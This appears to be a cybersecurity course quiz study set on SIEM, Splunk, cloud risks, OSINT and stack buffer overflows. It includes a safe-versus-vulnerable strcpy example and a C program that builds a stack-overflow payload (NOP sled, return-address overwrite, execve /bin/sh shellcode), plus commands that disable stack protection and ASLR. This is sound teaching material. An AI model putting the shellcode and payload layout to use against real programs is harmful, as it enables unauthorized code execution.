Cyber 262 - Quiz C
key insights and situational awareness can be visualized by creating which SIEM tool?
dashboard
key insights and situational awareness can be visualized with
dashboards
gcc stack.c -o stack_gdb -g -z execstack -fno-stack-protector
compile stack.c in debug mode (-g adds debug symbols for GDB, -z execstack makes the stack executable, -fno-stack-protector disables stack canaries)
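The command above builds a deliberately vulnerable C program. The following is an added example, not the course's own stack.c: it shows the classic shape of that bug (an unchecked strcpy into a fixed-size stack buffer) beside a bounds-checked version. The 24-byte buffer size and the function name bof are assumptions modelled on the usual lab program.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 24   /* assumed buffer size, modelled on the lab program */

/* Vulnerable: strcpy() stops only at the NUL byte, so any input longer
 * than BUF_SIZE runs past buffer[] and overwrites the saved EBP and the
 * return address stored above it in the stack frame.  Built with
 * -fno-stack-protector -z execstack, this is what the lab exploits. */
int bof_vulnerable(const char *str)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, str);            /* no length check at all */
    return 1;
}

/* Hardened: check that a NUL terminator exists within the first
 * BUF_SIZE bytes before copying anything, so the copy can never exceed
 * the buffer.  Returns 1 if the input was copied, 0 if it was rejected. */
int bof_safe(const char *str)
{
    char buffer[BUF_SIZE];
    const char *nul = memchr(str, '\0', BUF_SIZE);
    if (nul == NULL)                /* no terminator in range: too long */
        return 0;
    size_t n = (size_t)(nul - str); /* n <= BUF_SIZE - 1 */
    memcpy(buffer, str, n);
    buffer[n] = '\0';
    return buffer[0] == '\0' ? 1 : 1;   /* use buffer so it is not optimised away */
}

int main(void)
{
    /* Constructed oversized input: 100 'A's, far beyond BUF_SIZE. */
    char big[101];
    memset(big, 'A', 100);
    big[100] = '\0';

    printf("short input: %s\n", bof_safe("hello") ? "accepted" : "rejected");
    printf("100-byte input: %s\n", bof_safe(big) ? "accepted" : "rejected");
    /* bof_vulnerable(big) would smash the frame; it is deliberately not called. */
    return 0;
}
```

The only difference that matters is the check before the copy: the vulnerable version trusts the caller-supplied length, the hardened one derives the length from the destination size.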
name servers
DNS
What does the value of $2 in our GDB command represent?
EBP, the base (frame) pointer (not the stack pointer ESP)
temporary storage area in system memory
buffer
The program "exploit.py" has a buffer overflow vulnerability. When it is compiled the resulting binary can have its stack overflowed.
false
VM sprawl is a security concern because it involves artificially intelligent hypervisors that split off new hosts causing a sprawl effect
false
a SIEM is not intended to be used for monitoring and analysis of log data from applications, databases, and middleware
false
buffer overflows are no longer an issue; in fact a search of the CISA site for current buffer overflow vulnerabilities would yield little or no results
false
heap overflows are easier to perform than stack overflows
false
in class we focused on stack-based buffer overflows because heap-based overflows cannot perform code injection
false
machine data is only generated by network equipment
false
one of the 7 essential capabilities of an analytics-driven SIEM is endpoint management
false
pointer tracking of function calls makes it hard to use stack memory for overflows
false
the top 3 cloud providers are Amazon Web Services (AWS), Microsoft Azure, and Salesforce
false
/bin/program is the shell in Linux for our exploit
false (correct answer is /bin/sh)
Gathering as much information about the target
footprinting
sending malformed data as input and testing code for unexpected results
fuzzing
sending malformed data as input trying to get programs to crash
fuzzing
intitle:"SpeedStream Router Management Interface"
Google search operator syntax (Google dorking)
Data Loss or Data Leakage in the cloud can occur in many ways. Choose ALL that apply.
- weak authentication - lack of audit controls - failure to properly dispose of hard drives
Shell that our injected malicious code (shellcode) spawns
/bin/sh
kernel.randomize_va_space=0
ASLR (this sysctl setting turns it off)
mitigation that makes buffer overflow exploitation unreliable by randomizing where memory regions are placed
ASLR
base pointer (active stack frame)
EBP - base or frame pointer
a segmentation fault can be caused by a program trying to access an off limits memory location
true
buffer overflows are still a threat
true
compress and archive is not a main component of Splunk
true
data loss in the cloud can occur due to weak authentication or lack of audit controls
true
digital footprints or forensic data in logs are IOCs
true
overwriting a program's return address with some random address can point to invalid instructions and eventually malicious code
true
push and pop are part of the LIFO stack memory activities
true
roles define what users can do in Splunk
true
the saved EBP stored in a stack frame points to the function caller's stack frame
true
What value does the exploit.py program write into badfile to fill part of the buffer with NOP (no-op) instructions?
0x90
How many bytes need to be added to the offset that we gathered when running the GDB debugs? This offset is required to take into account the gap between the Return Address and the EBP pointer.
4 (the return address sits 4 bytes above the saved EBP on a 32-bit stack)
100 (decimal) in hex
64
NOP (no-op instruction) in hex is
90 (0x90; a null byte, by contrast, is 0x00)
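The four cards above describe how the payload file is laid out: a NOP sled, a return address written 4 bytes past the GDB-measured offset, and the shellcode at the end. The block below is an added example that assembles such a badfile; it is not the course's exploit.py. The 517-byte file size, the example offset and target address, and the use of the well-known Linux x86 execve("/bin/sh") shellcode are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define BADFILE_LEN 517   /* size the lab program reads; assumed */
#define NOP 0x90          /* x86 NOP: the sled filler, not a null byte */

/* Linux x86 execve("/bin/sh") shellcode (well known; assumed here, not
 * copied from the course's exploit.py).  The string's own NUL is excluded
 * from SHELLCODE_LEN. */
static const unsigned char shellcode[] =
    "\x31\xc0"          /* xor  eax, eax          */
    "\x50"              /* push eax   (NUL)       */
    "\x68" "//sh"       /* push "//sh"            */
    "\x68" "/bin"       /* push "/bin"            */
    "\x89\xe3"          /* mov  ebx, esp          */
    "\x50"              /* push eax   (envp)      */
    "\x53"              /* push ebx   (argv)      */
    "\x89\xe1"          /* mov  ecx, esp          */
    "\x99"              /* cdq                    */
    "\xb0\x0b"          /* mov  al, 11 (execve)   */
    "\xcd\x80";         /* int  0x80              */
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Lay out badfile as:
 *   [NOP sled][return address at gdb_offset + 4][NOP sled][shellcode]
 * gdb_offset is $ebp - &buffer as measured in GDB; adding 4 skips the saved
 * EBP so the 4-byte write lands exactly on the return address slot.
 * ret_addr is written little-endian.  Returns the index the return address
 * was written at, or -1 if the sizes do not work. */
long build_badfile(unsigned char *out, size_t out_len,
                   long gdb_offset, uint32_t ret_addr)
{
    if (gdb_offset < 0) return -1;
    size_t ret_pos = (size_t)gdb_offset + 4;
    if (out_len < SHELLCODE_LEN || ret_pos + 4 > out_len - SHELLCODE_LEN)
        return -1;                  /* slot would overlap the shellcode */

    memset(out, NOP, out_len);      /* NOP sled everywhere first */

    out[ret_pos + 0] = (unsigned char)(ret_addr & 0xff);
    out[ret_pos + 1] = (unsigned char)((ret_addr >> 8) & 0xff);
    out[ret_pos + 2] = (unsigned char)((ret_addr >> 16) & 0xff);
    out[ret_pos + 3] = (unsigned char)((ret_addr >> 24) & 0xff);

    /* shellcode goes at the very end so any landing point in the sled
     * slides forward into it */
    memcpy(out + out_len - SHELLCODE_LEN, shellcode, SHELLCODE_LEN);
    return (long)ret_pos;
}

/* Read back the little-endian 32-bit value at pos (used to verify layout). */
uint32_t read_le32(const unsigned char *buf, size_t pos)
{
    return (uint32_t)buf[pos] | ((uint32_t)buf[pos + 1] << 8) |
           ((uint32_t)buf[pos + 2] << 16) | ((uint32_t)buf[pos + 3] << 24);
}

int main(void)
{
    unsigned char badfile[BADFILE_LEN];
    /* Example numbers, assumed rather than taken from lab output:
     * $ebp - &buffer = 32, target address somewhere in the sled. */
    long pos = build_badfile(badfile, sizeof badfile, 32, 0xbfffea40u);
    if (pos < 0) { fputs("layout does not fit\n", stderr); return 1; }

    FILE *f = fopen("badfile", "wb");
    if (!f) { perror("badfile"); return 1; }
    fwrite(badfile, 1, sizeof badfile, f);
    fclose(f);
    printf("wrote badfile, return address at offset %ld\n", pos);
    return 0;
}
```

With a measured offset of 32 the return address lands at index 36, which is the "+4" from the card above; the sled before and after it is why the exact target address does not have to be guessed precisely.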
debugger used on compiled C programs
GDB (GNU Debugger)
After the Capital One AWS cloud breach by Paige Thompson, Amazon added ________________ to act as a defense-in-depth mechanism that improves session authentication. This is also referred to as a new version of the Instance Metadata Service.
IMDSv2
NOP (0x90) instructions placed into the buffer ahead of the shellcode (the NOP sled)
NOPs
return address field on the stack
RT (the return address slot)
machine data is almost always ____
unstructured
technology that automates incident response and threat intel handling using playbooks and workflows
SOAR (Security Orchestration, Automation and Response)
a vulnerability in a hypervisor that lets code running in a guest break out and interact directly with that hypervisor (or host)
VM escape
attack (worm) that flooded the buffer with N's repeatedly
Code Red
dynamic memory allocation functions like malloc and calloc hand out memory from which memory segment
heap
capability of SIEM that helps manage potential breaches and their aftermath to reduce recovery times
incident response
which essential capability of analytics-driven siem requires managing a potential breach and the aftermath to limit damage and reduce recovery time
incident response
A recent breach at ABC Corp revealed information in log files consistent with that found in other attacks. In this case, information such as domain names, IP addresses and malware signatures are considered what?
indicators of compromise - IOC
Which cloud computing attack risk is concerned with the security of a set of functions used for connection to cloud services?
insecure APIs
cloud attack risk dealing with the security of functions used for connection to cloud services
insecure APIs
allows users to visualize their Elasticsearch data
Kibana
________ data makes up more than 90% of the data accumulated by organizations
machine
Which cloud computing attack risk resides in organizations and can cause significant losses because of the potential knowledge and access the attacker has?
malicious insiders
a top OSINT tool that runs on Kali
Maltego
gcc option used when compiling a C program to disable stack protection (canaries)
-fno-stack-protector
term that means our organizations data center assets reside in our own data center and not in the cloud
on premise
searching for publicly available information about people or organizations
OSINT
indirect recon approach that does not engage the victim
passive
what are the 3 main default roles in Splunk
power, user, admin
Address in our Buffer Overflow Lab we want to replace
return address
in our lesson and lab we focused on overwriting the _________ to point to malicious code
return pointer (return address)
google maps
satellite imagery
Splunk _____ strings are sent from the search head
search
what is at the heart of cloud services and considered a key requirement for managing resources
self service
what is at the heart of cloud services and considered a key requirement. this feature is often not feasible for companies who try to manage their own environments on premise
self service
allows a user to run a program with the program owner's privileges
set-UID
search engine optimized for finding Internet-connected devices
Shodan
Splunk knows where to break the event, where the time stamp is located and how to automatically create field value pairs using these.
source types
Splunk uses ____________ to categorize the type of data being indexed.
source types
Program we used in the lab that had a buffer overflow vulnerability
stack (stack.c)
buffer overflows that are easier to perform and target the memory used for function frames
stack
buffer overflows that are easier to perform than heap overflows
stack
the ______ dynamically allocates local variables used in functions and passes values and parameters to the functions
stack
stack fills from
top down (grows from high addresses toward low addresses)
in Splunk, the creation of visualizations and statistics is done by ________ commands
transforming
One of the reasons that organizations would move to the cloud is to focus on their core business and basically outsource the running of the Data Center and systems to a third party
true
Recon-NG is an OSINT tool that is part of Kali and has an interface similar to Metasploit.
true
SPLUNK and QRadar are considered SIEM tools
true
The program "stack.c", when compiled has a Buffer Overflow Vulnerability.
true
VM sprawl is a security concern because virtual servers are easily created and often unmanaged
true